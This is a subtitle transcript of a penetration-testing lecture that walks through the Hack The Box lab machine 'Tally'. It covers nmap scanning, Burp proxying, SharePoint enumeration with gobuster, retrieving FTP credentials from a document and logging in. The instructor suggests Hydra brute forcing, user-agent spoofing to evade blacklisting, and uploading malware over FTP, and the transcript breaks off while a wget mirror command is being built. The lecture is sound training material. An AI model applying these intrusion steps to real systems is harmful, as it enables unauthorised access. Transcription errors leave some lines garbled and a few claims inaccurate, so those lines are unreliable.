1
00:00:00,330 --> 00:00:07,590
So here we are in Tally, and this is the initial access, I guess you could say, the exploitation

2
00:00:07,590 --> 00:00:13,110
lecture, that we're going to, of course, move into the privilege escalation lecture and then we'll

3
00:00:13,320 --> 00:00:18,510
do some debrief, some incident response type stuff, and we'll look at how everything maps to the MITRE

4
00:00:18,510 --> 00:00:19,320
ATT&CK framework.

5
00:00:19,860 --> 00:00:23,660
So in the beginning, you know, we need to make sure first that our box has started up.

6
00:00:23,670 --> 00:00:25,560
So let's just confirm that it is.

7
00:00:29,240 --> 00:00:32,860
Let's see, here's my machine here and it's going to refresh this to make sure everything's current.

8
00:00:37,910 --> 00:00:39,020
All right, looks pretty good.

9
00:00:42,580 --> 00:00:47,620
All right, so first thing we need to do is make sure we are connected right now, we have nothing in

10
00:00:47,620 --> 00:00:52,150
this folder, but we're not connected to the VPN yet.

11
00:00:52,210 --> 00:00:54,070
There are no tmux sessions listening either.

12
00:00:54,670 --> 00:00:57,490
So let's set this up now.

13
00:00:57,520 --> 00:01:02,770
We're going to want to make sure that tmux logging is enabled so that we can sort of have a script or

14
00:01:02,770 --> 00:01:06,760
a narrative and we can basically have all of our commands copied to a file.

15
00:01:06,970 --> 00:01:12,550
And then we can go back and debrief and look at that file, you know, to sort of review our offensive

16
00:01:12,550 --> 00:01:13,090
activities.

17
00:01:13,090 --> 00:01:13,930
And we can learn from that.

18
00:01:14,340 --> 00:01:14,680
Right.

19
00:01:14,690 --> 00:01:17,740
So we should install tmux logging.

20
00:01:18,070 --> 00:01:25,690
If we look at the .tmux.conf file, we can see that we have the line for tmux logging.

21
00:01:26,260 --> 00:01:30,880
But if you look for that, you'll see it doesn't exist.

22
00:01:31,270 --> 00:01:32,860
So we need to grab tmux logging first.

23
00:01:32,860 --> 00:01:33,660
We need to set that up.

24
00:01:34,410 --> 00:01:35,110
Let's go and do that.

25
00:01:46,490 --> 00:01:51,680
All right, so first thing we should do is install this tmux plugin manager and we should

26
00:01:51,680 --> 00:01:53,350
add this to our .tmux.conf file.

27
00:01:53,910 --> 00:01:54,940
So let's go ahead and do that.

28
00:01:56,860 --> 00:02:00,890
Let's open .tmux.conf in vim,

29
00:02:06,020 --> 00:02:08,060
and let's just go down and add it.

30
00:02:10,760 --> 00:02:13,580
Let's put it right here, right?

31
00:02:15,560 --> 00:02:16,400
What else do we need?

32
00:02:16,760 --> 00:02:22,370
Well, this is prefix + I to fetch the plugin and source it, so we need to be in a session.

33
00:02:23,330 --> 00:02:31,670
The name is VPN and this will be gone, and I'll just press Ctrl-A I to source, and Ctrl-A is

34
00:02:31,670 --> 00:02:32,240
the prefix.

35
00:02:32,540 --> 00:02:34,910
And I is the command.

36
00:02:34,910 --> 00:02:38,660
I need to fetch the plugin and source it. Now I need to clone the repo.

37
00:02:44,530 --> 00:02:50,180
This clone path obviously needs to match what we have in

38
00:02:52,440 --> 00:02:55,100
the .tmux.conf file, right,

39
00:02:58,140 --> 00:03:04,380
so you can see here, we're saying it's located here, so we want this clone path to match that.

40
00:03:05,700 --> 00:03:06,690
So let's go ahead and do that

41
00:03:11,520 --> 00:03:20,900
right away to go to the front row, which is what works and looks like it did exit this.

42
00:03:24,960 --> 00:03:30,420
What else? Do we have to reload the tmux environment?

43
00:03:30,690 --> 00:03:31,680
tmux source.

44
00:03:35,680 --> 00:03:43,720
File right control should be a very loaded it.

45
00:03:45,670 --> 00:03:46,480
Very cool.

46
00:03:46,630 --> 00:03:50,130
And let's see if this works now, Ctrl-A Shift-P.

47
00:03:50,680 --> 00:03:52,620
Yes, we are now logging our history.

48
00:03:53,080 --> 00:03:55,120
Let's go full screen and let's have fun.

49
00:03:58,000 --> 00:04:02,230
So first, let's go to VPN, sudo openvpn.

50
00:04:02,470 --> 00:04:05,080
Let's make sure we connect to Hack The Box.

51
00:04:09,080 --> 00:04:12,300
Means we're connected to 21 immediately.

52
00:04:12,340 --> 00:04:14,960
Let's just save the target to a variable

53
00:04:18,530 --> 00:04:22,330
and you can see they've got this variable saved in this session.

54
00:04:26,020 --> 00:04:30,220
Now what we're going to do is ping the host, let's make sure it's active, and I'm also going to show you how

55
00:04:30,220 --> 00:04:35,400
you can use this to identify the operating system with the hop count.

56
00:04:36,010 --> 00:04:39,150
We want to ping four times and we want to ping the target.

57
00:04:40,960 --> 00:04:48,580
So the TTL basically is decremented with each hop to the target.

58
00:04:48,910 --> 00:04:53,320
And we have one router between us and the target, and that's why it's decremented from 128 to

59
00:04:53,340 --> 00:04:53,990
127.

60
00:04:54,580 --> 00:05:01,570
Now, if you're between 64 and 128 for TTL, that means you're running a Windows host, most likely;

61
00:05:02,230 --> 00:05:05,880
if it's somewhere below 64, it's most likely a Linux host.

62
00:05:05,890 --> 00:05:12,490
And if it's above 128, between 128 and 255, it's probably infrastructure running a specialized version

63
00:05:12,490 --> 00:05:15,710
of Linux or a proprietary operating system.

64
00:05:16,600 --> 00:05:18,260
So that is something very good to know.

65
00:05:19,420 --> 00:05:23,770
Let's run Nmap against this, maybe -Pn.

66
00:05:23,770 --> 00:05:25,620
Because we've seen the host is already active.

67
00:05:25,630 --> 00:05:26,470
Don't bother pinging it.

68
00:05:26,980 --> 00:05:33,040
Make it -sC, you know, run default scripts.

69
00:05:33,070 --> 00:05:36,040
These are safe scripts that won't knock the box over.

70
00:05:36,570 --> 00:05:41,830
Make sure the scans are verbose and that it shows the version number of the identified service.

71
00:05:41,860 --> 00:05:43,240
So we want to get the version information.

72
00:05:45,160 --> 00:05:53,680
We want to output everything in all Nmap formats and we'll call it tally-nmap, and --open.

73
00:05:53,710 --> 00:05:54,310
Show me the reason.

74
00:05:54,310 --> 00:06:01,300
If it's not open, I don't want it. This particular port range: TCP ports from 0 to

75
00:06:01,300 --> 00:06:01,930
65535.

76
00:06:02,560 --> 00:06:04,480
And then finally, the target

77
00:06:07,300 --> 00:06:12,540
immediately we see Port 80 is open and we see a bunch of other ports, 21.

78
00:06:12,540 --> 00:06:13,450
This is FTP.

79
00:06:14,200 --> 00:06:15,610
We've got some SMB ports.

80
00:06:16,270 --> 00:06:21,310
This is RPC here and these are legacy RPC ports, which are typically open in all versions of Windows,

81
00:06:21,700 --> 00:06:23,220
and 445 for SMB.

82
00:06:23,230 --> 00:06:24,090
This is exposed.

83
00:06:24,100 --> 00:06:26,680
So this might be a vector. 81.

84
00:06:26,680 --> 00:06:31,420
We have a few other ports here, but I'm not too early on.

85
00:06:31,810 --> 00:06:32,940
But let's see what else we can do.

86
00:06:34,180 --> 00:06:34,840
Discovery

87
00:06:39,010 --> 00:06:41,650
and let's see if we can basically browse that page.

88
00:06:41,650 --> 00:06:45,070
Now, before we do that, we want to make sure that we get everything going through Burp.

89
00:06:45,610 --> 00:06:47,560
So let's open up our.

90
00:06:53,170 --> 00:06:54,340
Make sure everything's filtering through.

91
00:07:10,760 --> 00:07:13,640
All right, quick, next, let's start Burp.

92
00:07:17,550 --> 00:07:23,970
Right, Ctrl-Shift, turn off Intercept. Proxy, go to Options, scroll down, make sure you're intercepting

93
00:07:23,970 --> 00:07:30,390
requests. Ctrl-Shift, Target, Site map is ready to receive the site tree.

94
00:07:30,850 --> 00:07:37,350
So what we're going to do is pop in this URL, and it's being filtered through Burp.

95
00:07:42,890 --> 00:07:44,530
And we should start to see things build out.

96
00:07:44,590 --> 00:07:47,000
You can see already it's starting to happen now.

97
00:07:47,610 --> 00:07:49,640
We want to get some idea of what kind of page this is.

98
00:07:49,640 --> 00:07:50,990
You know, we could wait for the page to blow up.

99
00:07:50,990 --> 00:07:53,210
We could wait for everything to show up or we're going to take a look here.

100
00:07:53,990 --> 00:07:57,920
We notice in the response we can see that this application is running

101
00:07:58,650 --> 00:08:05,240
IIS version 10, which means it's either running on a Windows 10 machine or Windows Server 2016

102
00:08:05,240 --> 00:08:07,400
or Windows Server 2019.

103
00:08:08,440 --> 00:08:10,820
So it's either one of those OSes running ASP.NET.

104
00:08:12,620 --> 00:08:16,330
And you can see here it's running Microsoft SharePoint Team Services.

105
00:08:16,350 --> 00:08:17,870
So this is most likely a SharePoint server.

106
00:08:18,350 --> 00:08:23,630
Now, there's another way we could do this to identify what it is: we could actually install Wappalyzer,

107
00:08:23,630 --> 00:08:29,450
which is an awesome tool. BuiltWith is also another good one.

108
00:08:29,870 --> 00:08:33,980
Let's just install both of them because we'll need them later in this course.

109
00:08:39,930 --> 00:08:41,160
I don't even know if I spelled it right.

110
00:08:42,450 --> 00:08:43,200
I did, I did.

111
00:08:43,890 --> 00:08:44,420
It's OK.

112
00:08:44,550 --> 00:08:45,660
Google fixes typos.

113
00:08:48,440 --> 00:08:51,140
All right, so we want the extension for Firefox.

114
00:09:07,540 --> 00:09:14,790
Wappalyzer is installed. Ctrl-W to close it out, let's get BuiltWith.

115
00:09:33,780 --> 00:09:40,530
These have both been added. Ctrl-W to close it out, and if we go to Wappalyzer and BuiltWith,

116
00:09:40,530 --> 00:09:41,670
oh, there we go, just click on it.

117
00:09:42,090 --> 00:09:47,580
So BuiltWith is now showing Microsoft SharePoint and saying it's 50 percent sure about their web server

118
00:09:48,210 --> 00:09:49,050
software as a service.

119
00:09:49,050 --> 00:09:49,890
Microsoft SharePoint.

120
00:09:50,070 --> 00:09:52,830
You can also identify SharePoint by this icon here.

121
00:09:53,640 --> 00:09:59,940
Also, if you hit Ctrl-U, you look at the source of the web application, you'll see it says SharePoint.

122
00:10:00,750 --> 00:10:05,310
Now that we know with a high degree of certainty we're working with SharePoint, we can start enumerating

123
00:10:05,820 --> 00:10:13,080
things related to SharePoint. Nmap scan finished, and you'll notice it actually says SharePoint services

124
00:10:14,400 --> 00:10:15,900
in the certificate.

125
00:10:16,320 --> 00:10:21,600
So we have a high, high degree of certainty that this is the SharePoint server. Let's

126
00:10:21,600 --> 00:10:30,690
go look at what Nmap returned. So port 21, FTP, running Microsoft FTP, it says the system is

127
00:10:30,690 --> 00:10:35,770
Windows NT, which is probably a false positive since SharePoint doesn't run on Windows NT

128
00:10:35,790 --> 00:10:36,210
4.

129
00:10:38,100 --> 00:10:43,830
There's a favicon, so let's say it didn't say SharePoint in the source or in the HTTP response.

130
00:10:44,550 --> 00:10:51,990
You could pivot off the hash in Google to see what other web pages are using that

131
00:10:51,990 --> 00:10:57,150
favicon and then potentially identify the browser technology that way.

132
00:10:57,990 --> 00:11:03,890
Alternatively, you could download the icon and then go look for it.

133
00:11:03,900 --> 00:11:04,880
This is the favicon here, right.

134
00:11:04,890 --> 00:11:09,060
I can go right click actually have acted out of favor.

135
00:11:09,270 --> 00:11:11,850
I think I would have to go Ctrl-U.

136
00:11:13,320 --> 00:11:13,920
There we go.

137
00:11:14,010 --> 00:11:14,400
Yeah.

138
00:11:17,940 --> 00:11:20,520
Down this way and then I'd go like right

139
00:11:20,520 --> 00:11:27,270
click and see the image and then I would go to Google Images and do a Google image search.

140
00:11:27,630 --> 00:11:32,430
So Google, is it google.com/images or is it

141
00:11:32,430 --> 00:11:33,330
images.google.com?

142
00:11:33,330 --> 00:11:34,950
I'm not sure yet.

143
00:11:35,070 --> 00:11:37,830
I think this is it.

144
00:11:37,830 --> 00:11:38,010
Yeah.

145
00:11:38,010 --> 00:11:42,540
I think if you click this camera, right, you can upload an image and then you could actually upload the

146
00:11:42,540 --> 00:11:42,750
image.

147
00:11:42,750 --> 00:11:50,910
So for example, if I went here and I said File, Save Image As, I would put it in the right folder.

148
00:11:58,220 --> 00:12:05,480
Let's call it Simcock, it's called Khaleda Icko.

149
00:12:21,860 --> 00:12:23,120
Not seeing it for some reason.

150
00:12:26,610 --> 00:12:28,140
Maybe they can just drag and drop it in here.

151
00:12:30,430 --> 00:12:32,490
Try dragging an image here, OK, we can do that.

152
00:12:44,940 --> 00:12:45,750
Did I not save it?

153
00:13:01,750 --> 00:13:04,780
Felde That is really weird.

154
00:13:04,850 --> 00:13:06,250
OK, I have no idea why that's fine,

155
00:13:09,280 --> 00:13:10,740
but let's not go into too deeply anyway.

156
00:13:10,750 --> 00:13:13,840
You get the idea, you upload the image here and then you would find out what other pages are using

157
00:13:13,840 --> 00:13:13,990
it.

158
00:13:18,700 --> 00:13:22,150
So here you could, of course, you would click Sign In and you could sign in that way.

159
00:13:22,720 --> 00:13:23,690
We don't have any credentials.

160
00:13:23,690 --> 00:13:25,060
So this is not going to help us much.

161
00:13:25,180 --> 00:13:26,050
Let's cancel this.

162
00:13:29,110 --> 00:13:35,350
401 Unauthorized, of course, let's go back and let's see what we can do here.

163
00:13:40,570 --> 00:13:45,320
So we already knew about Port 80, Port 81, that's a new one.

164
00:13:45,590 --> 00:13:46,570
Ever heard of that one yet?

165
00:13:48,130 --> 00:13:50,050
These are all the SMB ports.

166
00:13:50,680 --> 00:13:56,020
Interestingly enough, the operating system thinks it's running Windows Server 2008, R2 or 2012.

167
00:13:57,010 --> 00:14:00,220
It doesn't actually know based on the SMB.

168
00:14:03,010 --> 00:14:08,860
And then here we can see it running Microsoft SQL Server 2016 with the exact version number.

169
00:14:08,860 --> 00:14:14,770
So we could searchsploit for this version number to see if we can identify if there's any exploits

170
00:14:14,770 --> 00:14:17,650
available for this particular application.

171
00:14:20,020 --> 00:14:29,240
And we also can see down here the host name of the target, and also we have a product version.

172
00:14:29,260 --> 00:14:34,850
Again, this is something that we could key on to see if there's any public vulnerabilities in Exploit-DB

173
00:14:35,440 --> 00:14:37,660
or Sploitus.

174
00:14:37,850 --> 00:14:38,830
I don't know if you guys have heard of that.

175
00:14:38,830 --> 00:14:43,510
One is called Sploitus.

176
00:14:47,560 --> 00:14:48,080
Sploitus.

177
00:14:48,610 --> 00:14:49,950
Yeah, I think it's called Sploitus.

178
00:14:52,580 --> 00:14:56,980
Let me just check real quick, it's sploitus.com.

179
00:14:58,570 --> 00:14:59,430
Yeah, this is it.

180
00:14:59,830 --> 00:15:01,650
So this is an alternative to the Web.

181
00:15:01,840 --> 00:15:02,800
Not quite as many

182
00:15:05,800 --> 00:15:10,360
exploits as Exploit-DB, but it's still pretty good.

183
00:15:11,230 --> 00:15:16,510
This is also a site that I strongly recommend when you're looking for public exploits and vulnerabilities

184
00:15:16,510 --> 00:15:17,200
and things like that.

185
00:15:17,940 --> 00:15:20,260
See, we get some exploits down here and you can search for them, of course.

186
00:15:22,560 --> 00:15:22,960
All right.

187
00:15:22,960 --> 00:15:23,910
So let's close up

188
00:15:26,890 --> 00:15:33,970
anything else, a couple of other ports from that five, fifteen, five, six, seven.

189
00:15:34,690 --> 00:15:35,890
So I don't know what these are.

190
00:15:36,130 --> 00:15:37,290
This hostname is going to come in handy.

191
00:15:37,300 --> 00:15:39,220
We should probably put this in our host file.

192
00:15:39,640 --> 00:15:42,370
We'll do that in a second. A few other ports.

193
00:15:43,900 --> 00:15:46,390
I'm not really too worried about these high level ports right now.

194
00:15:46,750 --> 00:15:50,950
And if we get stuck that we can circle back around to see if there's something that increased the attack

195
00:15:50,950 --> 00:15:54,550
surface of the target through one of these ports.

196
00:15:55,420 --> 00:15:58,840
OK, so what we can do is go back to Discovery

197
00:16:01,960 --> 00:16:05,080
and we can gobuster here, which we don't have, see, it's red.

198
00:16:05,830 --> 00:16:10,630
So we can do sudo apt install gobuster and let it install.

199
00:16:11,350 --> 00:16:15,130
We can start looking for common SharePoint URLs.

200
00:16:15,130 --> 00:16:15,380
Right.

201
00:16:16,420 --> 00:16:17,350
So now I can go here.

202
00:16:17,920 --> 00:16:21,730
I could just Google like common SharePoint

203
00:16:25,660 --> 00:16:27,880
Wow, I cannot spell URLs.

204
00:16:29,940 --> 00:16:35,660
I mean, there, get a few here, so this might be interesting, right, so content realist's, we could

205
00:16:35,660 --> 00:16:42,740
try that out, like basically just, you know, copy this and see if we can just, like, append it

206
00:16:43,190 --> 00:16:43,610
here.

207
00:16:46,120 --> 00:16:48,400
He would have to slash something loads.

208
00:16:52,070 --> 00:16:52,490
OK, good.

209
00:16:52,520 --> 00:16:58,280
So we actually did get something. The other thing we could do is we could just Google for like SharePoint

210
00:16:58,290 --> 00:16:59,040
pentest report.

211
00:17:04,430 --> 00:17:08,420
Sometimes these things leak to the Internet and you can get everything you need from there.

212
00:17:10,280 --> 00:17:12,200
Or at least we have a good, you know, a good starting point.

213
00:17:12,380 --> 00:17:16,550
It's like this is a PDF and this might give us something to work with.

214
00:17:18,410 --> 00:17:21,950
Yeah, it's a sample SharePoint scan report.

215
00:17:25,550 --> 00:17:33,470
So this is a fictitious website, SharePoint Target dot com of SharePoint information of these targets.

216
00:17:33,890 --> 00:17:37,250
So these might be interesting by these.

217
00:17:37,250 --> 00:17:41,000
I'm referring to these these path right here.

218
00:17:44,570 --> 00:17:45,610
See what else we have in here.

219
00:17:49,050 --> 00:17:54,840
So this right here, an attacker could use this information to make specific attacks against this SharePoint

220
00:17:54,850 --> 00:17:58,090
installation, and might be useful.

221
00:18:00,060 --> 00:18:01,420
Got these catalogs

222
00:18:04,510 --> 00:18:08,100
for catalog pages could contain confidential information, which could be useful to attackers.

223
00:18:08,120 --> 00:18:09,260
We might want to check this one out.

224
00:18:12,890 --> 00:18:17,150
Other pages here. The nice thing about this pentest report is that it actually includes, like, the description

225
00:18:17,150 --> 00:18:22,160
of the risk and then the recommendations that you're not just hunting in the blind or hunting blind

226
00:18:22,160 --> 00:18:23,100
for all this information.

227
00:18:24,370 --> 00:18:24,670
Right.

228
00:18:26,480 --> 00:18:32,840
So I like the idea of, you know, looking for public pentest reports on the target that you're testing

229
00:18:32,840 --> 00:18:36,740
to see if you can find, you know, a point of entry.

230
00:18:36,970 --> 00:18:37,190
Right.

231
00:18:37,250 --> 00:18:38,600
Click and duplicate this tab.

232
00:18:39,200 --> 00:18:44,300
We can probably go to the path that was included inside that report.

233
00:18:52,100 --> 00:18:54,620
And see if there's anything that's kind of interesting.

234
00:18:56,190 --> 00:18:57,770
Not exactly what I expected.

235
00:19:00,440 --> 00:19:07,460
Anyway, let's go back here and let's go first back to our hosts file, as we said, we were going to

236
00:19:08,090 --> 00:19:14,960
update that. sudo vim /etc/hosts

237
00:19:18,320 --> 00:19:22,280
10.10.10.59 tally.

238
00:19:24,470 --> 00:19:25,670
Remember where we got that from?

239
00:19:26,570 --> 00:19:28,190
We got that from our Nmap output.

240
00:19:32,250 --> 00:19:32,730
Right here.

241
00:19:32,940 --> 00:19:38,430
All right, so we've got a target and we're just going to that 12 and.

242
00:19:41,570 --> 00:19:51,940
We now should have gobuster, we do. So what we can do now is start a gobuster session so we can

243
00:19:52,370 --> 00:19:53,060
gobuster here.

244
00:19:55,010 --> 00:19:56,260
So gobuster is the command.

245
00:19:56,480 --> 00:19:58,770
What we want to do is, I want a list of directories.

246
00:19:58,820 --> 00:20:00,410
We're basically doing forced browsing.

247
00:20:03,500 --> 00:20:07,760
And so now we've got gobuster dir.

248
00:20:07,760 --> 00:20:10,730
We need some flags here, the flags here, the options.

249
00:20:10,970 --> 00:20:11,570
What do we want?

250
00:20:14,060 --> 00:20:18,950
Well, I'd say we should expand the full URLs.

251
00:20:20,840 --> 00:20:24,980
We should include the length of the body in the output.

252
00:20:27,590 --> 00:20:28,190
What else?

253
00:20:30,110 --> 00:20:30,580
URL,

254
00:20:33,950 --> 00:20:40,130
and if I do a ping against tally, it should resolve, and it does because of what we have in our hosts

255
00:20:40,130 --> 00:20:43,010
file, resolving that name to the IP.

256
00:20:45,140 --> 00:20:48,560
So I can do -u http://tally

257
00:20:51,650 --> 00:20:52,690
is registering.

258
00:20:52,730 --> 00:20:54,020
We'll keep that the same for now.

259
00:20:54,560 --> 00:20:59,360
If we went up against any blacklisting, are there any defenses that the target's using?

260
00:20:59,360 --> 00:21:07,060
We can try to bypass it by changing our user agent, trying to match a benign browser like Chrome. Threads.

261
00:21:07,190 --> 00:21:08,840
Let's keep it low right now.

262
00:21:10,590 --> 00:21:11,780
We're going to run this in the background.

263
00:21:12,260 --> 00:21:21,150
We don't want to knock over the server with our scan. And the word list. Now let's get output going.

264
00:21:21,680 --> 00:21:23,150
I'll output this into tally

265
00:21:23,480 --> 00:21:24,140
gobuster.

266
00:21:25,500 --> 00:21:27,800
And the word list is interesting.

267
00:21:27,980 --> 00:21:28,730
What are we going to use?

268
00:21:30,500 --> 00:21:33,920
Well, we can do a search for anything with SharePoint in the name.

269
00:21:34,760 --> 00:21:37,420
So we get a few files, some Ruby files and Mexica files.

270
00:21:37,430 --> 00:21:38,450
We only want text files.

271
00:21:40,310 --> 00:21:45,380
So what we could do is we could use find, starting at root, case-insensitive, to search for anything with

272
00:21:45,380 --> 00:21:45,790
SharePoint,

273
00:21:45,830 --> 00:21:51,200
any type of file, and send all the errors to the bit bucket.

274
00:21:55,760 --> 00:22:00,470
Now, we've got some files that are word lists clearly, but we don't know which one to pick.

275
00:22:00,850 --> 00:22:08,060
And so the way I think about this logically is you probably want the one that has the most unique lines

276
00:22:08,180 --> 00:22:09,460
related to SharePoint in it.

277
00:22:10,490 --> 00:22:19,340
So let's go ahead and use the xargs command to run the wc command against each of these files.

278
00:22:20,060 --> 00:22:24,050
And then we can get an idea of how many lines are in each file and then which one we should use for

279
00:22:24,050 --> 00:22:26,180
our scan.

280
00:22:42,180 --> 00:22:47,800
I'm going right here, 1708, this looks very promising, so let's grab this

281
00:22:51,370 --> 00:22:52,900
and we can let that go.

282
00:22:56,770 --> 00:23:05,770
Now, while this runs, gobuster is running, it is starting, let's go play with

283
00:23:05,770 --> 00:23:06,100
this.

284
00:23:06,370 --> 00:23:12,190
So I'm going to go and put in the hostname because usually I get better results when using the hostname.

285
00:23:16,390 --> 00:23:21,690
And I click these two right here because we see one item for each: Documents and Site Pages.

286
00:23:21,690 --> 00:23:24,730
So it's probably something of interest here.

287
00:23:26,470 --> 00:23:31,390
We can look at our Burp site map and we see we have tally with the hostname here.

288
00:23:37,060 --> 00:23:38,820
A bunch of different folders are being built out.

289
00:23:40,730 --> 00:23:41,300
That's pretty cool.

290
00:23:44,030 --> 00:23:48,500
All right, what's even cooler is we have something called FTP details, let's go and grab that.

291
00:23:53,740 --> 00:23:57,520
We don't have anything to open it with, so we're going to probably have to install LibreOffice. Let's

292
00:23:57,520 --> 00:24:02,500
save that. I'm sure it's in Downloads, looks like it did.

293
00:24:04,320 --> 00:24:14,850
And let's copy it to this current folder. Move it from Downloads to this current folder.

294
00:24:17,890 --> 00:24:20,670
Let's just make sure that it is a document; it should be a zip archive.

295
00:24:20,680 --> 00:24:24,330
And it is. Note, docx files are actually zip files.

296
00:24:24,990 --> 00:24:30,180
This is the legacy document file format for Word documents.

297
00:24:30,690 --> 00:24:38,910
So we need LibreOffice, which we don't have, to read it, so I can do sudo apt install libre, tab complete,

298
00:24:40,080 --> 00:24:45,550
well, there's a lot, we just want libreoffice, -y to answer yes to all the defaults.

299
00:24:45,570 --> 00:24:50,670
And let's let that do its thing while we wait.

300
00:24:52,230 --> 00:24:59,130
All right, so we'll let that run and then we have a finance team web page because of the Internet Explorer

301
00:24:59,130 --> 00:25:04,170
logo and again, sometimes you'll discover that these Web applications are slow.

302
00:25:04,530 --> 00:25:07,770
That's because these are VMs running in Hack The Box and you're connected through a virtual private

303
00:25:07,770 --> 00:25:08,160
network.

304
00:25:08,430 --> 00:25:12,600
You know, even if you've got like Gigha Blast or some fiber optic connection going to your network,

305
00:25:13,350 --> 00:25:14,700
you might still be a little bit frustrated.

306
00:25:14,700 --> 00:25:15,630
But this is like real life.

307
00:25:15,630 --> 00:25:21,480
You know, a lot of times the web that you're targeting, if it's a pen test or a red team operation,

308
00:25:21,690 --> 00:25:22,800
will be slow and buggy.

309
00:25:23,160 --> 00:25:24,810
And so don't let that discourage you.

310
00:25:25,530 --> 00:25:28,860
So we've got something here interesting from the finance team migration update.

311
00:25:28,860 --> 00:25:30,180
Something related to a migration.

312
00:25:31,540 --> 00:25:31,750
Right.

313
00:25:33,000 --> 00:25:33,630
Hi, Hyla.

314
00:25:34,200 --> 00:25:37,680
Welcome to your new team page, as always.

315
00:25:37,690 --> 00:25:43,380
There's still a few finishing touches to make. So we have a potential username that we can potentially

316
00:25:44,460 --> 00:25:45,210
brute force.

317
00:25:46,020 --> 00:25:47,610
Maybe we could brute force the sign in here.

318
00:25:48,090 --> 00:25:49,530
I don't know, using Hydra.

319
00:25:49,540 --> 00:25:50,490
I mean, it's a good idea, right?

320
00:25:50,670 --> 00:25:51,270
Let's keep reading.

321
00:25:51,960 --> 00:25:57,660
Please upload the design mockups to the Intranet folder as index.html using the FTP user account.

322
00:25:57,960 --> 00:26:02,340
And we've got an FTP account. I aim to regularly review.

323
00:26:02,940 --> 00:26:04,260
I aim to review regularly.

324
00:26:06,210 --> 00:26:09,630
We'll also add the fund in client account pages in due course thinks they're in.

325
00:26:10,320 --> 00:26:17,910
So now we know this application is listening on port 21, which is FTP.

326
00:26:21,460 --> 00:26:25,920
So this account is most likely going to come in handy, so let's go ahead and create a file.

327
00:26:26,260 --> 00:26:27,930
It's called like creds.txt

328
00:26:33,650 --> 00:26:36,810
and what we're going to do is put in the username.

329
00:26:36,820 --> 00:26:37,840
We don't have a password yet.

330
00:26:38,470 --> 00:26:41,260
We can put where we retrieved it from, which is this page.

331
00:26:48,110 --> 00:26:56,660
All right, let's go back to go back there and see what's going on, LibreOffice is still running.

332
00:26:58,510 --> 00:27:01,220
Looks like gobuster finished,

333
00:27:08,000 --> 00:27:08,780
the file sizes here.

334
00:27:08,820 --> 00:27:11,510
Thirty four thousand kilobytes.

335
00:27:12,050 --> 00:27:13,850
So grep for some interesting things, right?

336
00:27:14,390 --> 00:27:20,600
You know, we could search for, like, documents, so we can do, like, sudo grep --color=always.

337
00:27:21,980 --> 00:27:25,000
Chauvelin no thinketh insensitive.

338
00:27:26,870 --> 00:27:30,110
We want to search for and we can use regular expressions.

339
00:27:30,320 --> 00:27:31,130
We don't need to do that.

340
00:27:31,130 --> 00:27:32,030
That we could just say,

341
00:27:35,890 --> 00:27:37,160
I don't know, doc,

342
00:27:39,980 --> 00:27:44,500
and we could put the final tab complete.

343
00:27:46,490 --> 00:27:49,370
OK, so there's some other potentially interesting endpoints here.

344
00:27:50,150 --> 00:27:51,800
You see, you've got the status code here.

345
00:27:53,030 --> 00:27:56,570
In fact, if we only want to see the hundreds, if we could just go up again and we could say, like

346
00:27:56,570 --> 00:27:59,180
Diondre, you know, we only get this one right.

347
00:28:00,170 --> 00:28:05,370
So you can always chain grep together with this pipe.

348
00:28:05,960 --> 00:28:07,850
Now, I don't know if that has performance implications.

349
00:28:07,850 --> 00:28:08,540
I'm sure it does.

350
00:28:08,540 --> 00:28:11,200
But we're not writing a performance-sensitive script.

351
00:28:11,300 --> 00:28:14,790
We are simply hacking this box right now.

352
00:28:14,810 --> 00:28:16,340
So performance is not an issue.

353
00:28:17,420 --> 00:28:19,340
So let's wait for this to finish and then let's see what we get back.

354
00:28:20,270 --> 00:28:26,810
We need to wait for LibreOffice to install so we can view that document, this one right here.

355
00:28:27,540 --> 00:28:32,150
FTP details looks juicy too. LibreOffice is done.

356
00:28:33,990 --> 00:28:36,590
See here so we can go to the beginning.

357
00:28:36,590 --> 00:28:43,910
So LibreOffice, let's open this document, and we're going to put the ampersand at the end, which

358
00:28:43,910 --> 00:28:47,090
backgrounds the process so that control returns to the shell.

359
00:28:47,270 --> 00:28:54,950
If we left that off, it would hang the shell and only give us control back when we closed the document.

360
00:28:55,890 --> 00:28:56,870
So that's why I like that.

361
00:28:56,870 --> 00:28:59,300
Backgrounding the process, you could actually see the PID of the process.

362
00:28:59,300 --> 00:29:00,470
I see right there the.

363
00:29:06,920 --> 00:29:10,510
Right, so we've got LibreOffice open. Tip of the day, don't care about that.

364
00:29:10,700 --> 00:29:12,070
The cement bottom right corner.

365
00:29:13,780 --> 00:29:14,620
All right, what do we have?

366
00:29:14,620 --> 00:29:17,440
Host name we knew about. Workgroup we did not know about.

367
00:29:18,010 --> 00:29:20,080
So let's go and add that to our host file,

368
00:29:23,770 --> 00:29:25,180
/etc/hosts.

369
00:29:29,710 --> 00:29:36,400
We can do a tally that should be this gives us possibly a fully qualified domain that we can use later.

370
00:29:37,570 --> 00:29:38,920
We've got what looks like a password.

371
00:29:38,920 --> 00:29:41,260
Please create your own user folder upon logging in.

372
00:29:41,410 --> 00:29:49,570
OK, so it looks like we also have write access to this FTP server, so maybe we can use this as a mechanism

373
00:29:49,570 --> 00:29:55,330
for uploading malware to the box, and we should put these creds inside of our credential file

374
00:30:03,220 --> 00:30:04,700
and immediately we should try this out.

375
00:30:05,140 --> 00:30:11,280
Let's go back to recon. ftp tally, ftp_user.

376
00:30:13,880 --> 00:30:16,420
Let's see what that password is.

377
00:30:18,920 --> 00:30:29,090
Joseph F.C. Josh of the Inter yeah, yeah, yeah, we've got some good stuff in here, so I think we

378
00:30:29,090 --> 00:30:30,170
should download everything.

379
00:30:31,040 --> 00:30:36,290
You know, there's probably a lot of stuff in here and it's going to be hard to just cd into

380
00:30:36,290 --> 00:30:36,770
Everything.

381
00:30:37,860 --> 00:30:39,970
I don't really know, you know, where to go.

382
00:30:40,250 --> 00:30:43,250
So it's going to be a lot easier to actually mirror.

383
00:30:43,250 --> 00:30:52,070
The entire FTP server. There's actually a tool called, I think it's like curlftpfs or something like that.

384
00:30:52,340 --> 00:30:57,260
Yeah, curlftpfs, that's what it's called.

385
00:30:58,070 --> 00:31:07,610
You could use this to essentially treat your FTP server like a webpage and basically download

386
00:31:07,610 --> 00:31:08,120
everything from it.

387
00:31:08,120 --> 00:31:11,830
But I like using wget because it's a lot easier to remember, in my opinion.

388
00:31:13,010 --> 00:31:17,480
So we could, like, wget --help, pipe it to less this time.

389
00:31:21,400 --> 00:31:30,760
And I think make this pane a little bit smaller so we can build up our command. wget, what we want to do,

390
00:31:30,880 --> 00:31:37,390
